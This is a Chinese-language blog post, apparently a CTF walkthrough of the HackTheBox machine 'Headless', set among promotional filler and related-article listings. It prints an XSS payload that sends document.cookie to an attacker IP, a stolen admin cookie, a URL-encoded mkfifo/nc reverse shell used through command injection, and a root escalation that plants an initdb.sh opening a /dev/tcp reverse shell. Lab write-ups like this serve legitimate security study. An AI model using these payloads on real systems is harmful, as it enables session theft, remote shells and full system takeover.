HackThebox Headless

于 2024-05-16 17:18:40 发布
阅读量309 收藏 7
点赞数 5
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264662/article/details/138968951
版权

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

在这里插入图片描述

<img src=x οnerrοr=fetch('http://Your_IP/'+document.cookie);/>
# 攻击机上需要开启web服务
sudo php -S 0.0.0.0:80   # 使用python也可

在这里插入图片描述

管理员Cookie: ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
访问dashboard,将Cookie的值修改为ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
存在命令注入漏洞
在这里插入图片描述

反弹shell,payload(已进行url编码如下

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+Your_IP+4444+>/tmp/f

提权

sudo -l

dvir@headless:~$ sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass,
    secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

/usr/bin/syscheck是一个shell脚本

#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last\_modified\_time=$(/usr/bin/find /boot -name 'vmlinuz\*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted\_time=$(/usr/bin/date -d "@$last\_modified\_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted\_time"

disk\_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk\_space"

load\_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load\_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0

./initdb.sh 2>/dev/null执行当前目录下的initdb.sh文件
创建文件initdb.sh,可以进行反弹shell

#!/bin/bash
/bin/bash -i >& /dev/tcp/YOUR_IP/4445 0>&1
# 攻击机监听
nc -lvnp 4445

或者给bash赋予suid权限,然后运行/bin/bash -p

提权后

系统定时运行下述的python代码

#!/usr/bin/python3

import os
# import requests
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.service import Service

def extract_number(filename):
    return os.path.splitext(filename)[0]

options = webdriver.FirefoxOptions()
options.add_argument('--headless')
driver = webdriver.Firefox(options=options)
driver.set_page_load_timeout(5)

while True:
    login_url = "http://localhost:5000/"

    html_directory = "./hacking\_reports"

    html_files = [f for f in os.listdir(html_directory) if f.endswith(".html")]

    base_url = "http://localhost:5000/hacking\_reports/"

    for html\_file in html_files:
        number = extract_number(html_file)
        url = base_url + number

        print(f"Trying: {url}")

        try:
            driver.get(login_url)
            driver.get(url)
            time.sleep(2)
        except Exception as e:
            print(f"Error: {e}")
            pass
        os.remove("./hacking\_reports/" + html_file)
    time.sleep(60)

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84264662
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
chromeheadless.tar
11-27
chrome无头浏览器
docker-factorio-headless
03-09
Docker上的Factorio无头服务器打包了Dockerfile,并能够切换服务的savegame。用法拉图像docker pull tingtingths/factorio或自己建造docker build -t my_factorio_image .数据目录Mod,保存,日志,缓存等保存在容器...
Qt:windows下Qt安装教程
hw5230的博客
06-02 3418
对于 MinGW-w64 项目,它对应的小型系统环境叫 MSYS2(Minimal SYStem 2),MSYS2 是 MSYS 的衍生版,不仅支持 64 位系统和 32 位系统,还有自己的独特的软件包管理工具,它从 Arch Linux 系统里移植了 pacman 软件管理工具,所以装了 MSYS2 之后,可以直接通过 pacman 来下载安装软件,而且可以自动解决依赖关系、方便系统升级等。如何找到 Qt 软件的下载地址呢?只要前面两个数字相同,Qt 的特性就是一致的,最后的数字是对该版本的补丁更新。
Qt下载安装及配置教程(非常详细),从零基础入门到精通,看完这一篇就够了
热门推荐
Python_0011的博客
07-13 12万+
进入qt中文网站:https://www.qt.io/zh-cn/ 下载开源版 往下滑,下载Qt在线安装程序 它已经检测出我的是windows系统,直接点击download就好。如果是其它的系统,需要找到对应自己系统的安装包。 然后跟网速有关,等一会就会自动下载 等待下载完成,双击.exe文件,就可以进行安装。 首先就是登录qt账户,如果没有可以自行注册一个。然后选择个人用户,之后点击下一步进行安装。 如果期间有报出现网络错误,请参考我本篇文章:https://blog.csdn.net/changyana
【Qt5.12】Qt5.12安装教程[通俗易懂]
hw5230的博客
06-02 8022
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/145444.html原文链接:https://javaforall.cn。Step1: 双击安装包, 稍等片刻, 然后点击next。Step2: 如果没有账号, 则选择skip。Step3: Qt设置欢迎界面, 选择下一步。Step6: 同意许可协议, 然后选择下一步。Step5: 选择组件, 然后选择下一步。Step2: 选择Qt控件项目。Step4: 选择安装路径。Step9: 选择下一步。Step4: 选择Kit。
QT的安装 [新版2022]
飞浪纪元FE的博客
10-27 4495
最近QT发布了6版本,5.x版本依然坚挺,官方也给出了LTS的标识,类似Unity,作为长期支持版的意思。 安装方式变得简单,只需要一个账号,可以在线自动安装和下载所需要的版本。
如何在本地安装部署WinSCP,并实现公网远程本地服务器
最新发布
qq_63320529的博客
11-27 775
如何在本地安装部署WinSCP,并实现公网远程本地服务器。
在Java SE上使用Headless模式的超级指南
09-03
在Java SE平台上,Headless模式是一种特殊的运行环境,主要用于在没有显示器、键盘或鼠标的情况下运行应用程序。这种模式在处理图形生成、打印任务或其他无需用户交互的任务时非常有用。本文将深入探讨如何在Java SE...
linux/docker chrome headless pdf png
12-17
linux的chrome 63版本,zip包解压即可使用 ...1,特别适合使用chrome headless功能,在后台运行导出PDF和PNG的场景 2,在docker上使用chrome 3,任何linux版本均可,绿色zip压缩版本,解压后即可执行
chrome-headless-travis-build:持续构建chrome headless shell和docker image
01-31
chrome-headless-travis-build:持续构建chrome headless shell和docker image
微信小程序反编译工具
03-07
1.安装node 和 Microsoft VS Code 2.观看 wxapkg\小程序反编译全套\视频教程-解包流程 教学视屏 3.是否有分包处理方式不同,经过测试,目前还没有不能反编译的小程序 4.即使小程序有N个分包也能反编译,工具包里自带典型小程序 5.获取 wxapkg 包请百度,通用的做法是:安装 夜神模拟器 -> 安装微信 -> 打开小程序 -> 打开文件管理器(自带) -> 进入目录:/data/data/com.tencent.mm/MicroMsg/uuid/appbrand/pkg/xxx.wxapkg 6.如果小程序有分包,请在小程序中点击N多菜单
面试宝典Python 391页.pdf
07-04
面试宝典Python 391页.pdf
威胁情报平台OpenCTI搭建教程
流浪法师的博客
04-01 6072
OpenCTI是一个开源平台,允许组织管理他们的网络威胁情报知识和观察结果。它的创建是为了结构化、存储、组织和可视化关于网络威胁的技术和非技术信息。
Python 爬虫面试题 170 道:2019 版
qq_33570092的博客
06-10 1091
引言最近在刷面试题,所以需要看大量的 Python 相关的面试题,从大量的题目中总结了很多的知识,同时也对一些题目进行拓展了,但是在看了网上的大部分面试题不是很满意,一个...
17.JAVA之三大框架Maven、Springboot、SpringMVC
weixin_56027329的博客
05-06 1616
JAVA之三大框架Maven(eclipse和idea配置)、Springboot(eclipse和idea配置)、SpringMVC
java主流框架
qq_47360019的博客
10-15 2860
java主流框架
PbootCMS V1.3.8 发布,PHP免费建站系统
cpongo5
04-12 291
开发四年只会写业务代码,分布式高并发都不会还做程序员? >>> 更新日志: 1、新增同时支持f...
python 面试宝典
muhan的博客
08-14 212
自我介绍说什么? 个人信息 你好,我叫xxx,毕业于 xxx,所学专业是xxx 掌握的技术,参与过的项目 之前就职于xxx公司,担任后端工程师,负责xxx项目,对xxx技术比较熟悉 应聘的岗位,表达对该岗位的看法和兴趣 我的工作经验和目前这个岗位较为匹配,希望能够应聘到这个岗位… STAR模型 情景 什么情况下发生 任务 你是如何明确你的任务的 行动 采取了什么样...
虚拟机安装centos7
xiao_yu_gan的博客
04-07 1万+
1、简介 这里虚拟机采用VMware15.1.0,镜像采用CentOS7版本,官网或国内镜像可直接下载。 2、安装流程 1、打开vmware软件,点击 创建新的虚拟机。 2、选择 典型,点击 下一步。 3、选择 稍后安装操作系统。 4、选择 Linux,版本选择 CentOS 7 64位。 5、填写自己的虚拟机名称,选择安装的位置。 6、指定磁盘的大小。 7、点击 自定义硬件。 8、根据实际情况设置合适的内存。 9、选择对应的ISO映像文件。 10、设置合适的网络连接模式,这里选择NAT模
chromeheadless
09-03
Chrome-headless是Google针对Chrome浏览器59版新增加的一种模式,可以在不打开UI界面的情况下使用Chrome浏览器,并保持与Chrome完全一致的运行效果。它使用方法与Selenium类似。 要使用Chrome-headless,首先需要安装ChromeDriver。可以通过以下步骤来安装ChromeDriver: 1. 下载ChromeDriver:使用wget命令下载ChromeDriver,例如:`wget https://chromedriver.storage.googleapis.com/2.40/chromedriver_linux64.zip` 2. 解压ChromeDriver:使用tar命令解压下载的ChromeDriver文件,例如:`tar xvf chromedriver_linux64.zip` 3. 设置权限:使用chmod命令给解压后的ChromeDriver设置可执行权限,例如:`chmod 755 chromedriver` 配置代码如下所示: ```python from selenium import webdriver from selenium.webdriver.chrome.options import Options chrome_options = Options() chrome_options.add_argument('--headless') chrome_options.add_argument('--disable‐gpu') # 设置Chrome浏览器文件路径 path = r'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' chrome_options.binary_location = path # 创建Chrome-headless浏览器实例 browser = webdriver.Chrome(chrome_options=chrome_options) ``` 通过以上配置代码,你就可以使用Chrome-headless模式进行你需要的操作了。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Chrome-headless 使用](https://blog.csdn.net/grey_mouse/article/details/128243165)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [Chromeheadless安装与使用](https://blog.csdn.net/aWDac/article/details/80865754)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值